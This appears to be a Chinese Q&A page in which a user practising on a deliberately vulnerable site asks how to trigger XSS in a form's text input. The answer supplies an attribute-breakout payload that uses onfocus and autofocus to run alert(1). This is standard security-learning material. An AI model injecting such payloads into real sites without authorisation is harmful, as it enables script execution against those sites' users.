首页 > 解决方案 > 如何在 HTML 输入字段中启动 XSS 代码?

问题描述

我正在努力在一个假冒的网站上寻找漏洞,我想知道如何在这个输入字段中启动 XSS 代码?

<form name="friendForm" method="POST" action="/Tunestore/addfriend.do">
  Friend name: <input type="text" name="friend" value="&quot
    <script>alert(1)</script>"><br>
  <input type="submit" value="Submit">
</form>

标签: javascripthtmlxss

解决方案


尝试这个:

" onfocus="alert(1)" autofocus="

它将扩展为:

<'input type="text" name="friend" value=" " onfocus="alert(1)" autofocus=" " />

这将导致一个警告框,显示 XSS。


推荐阅读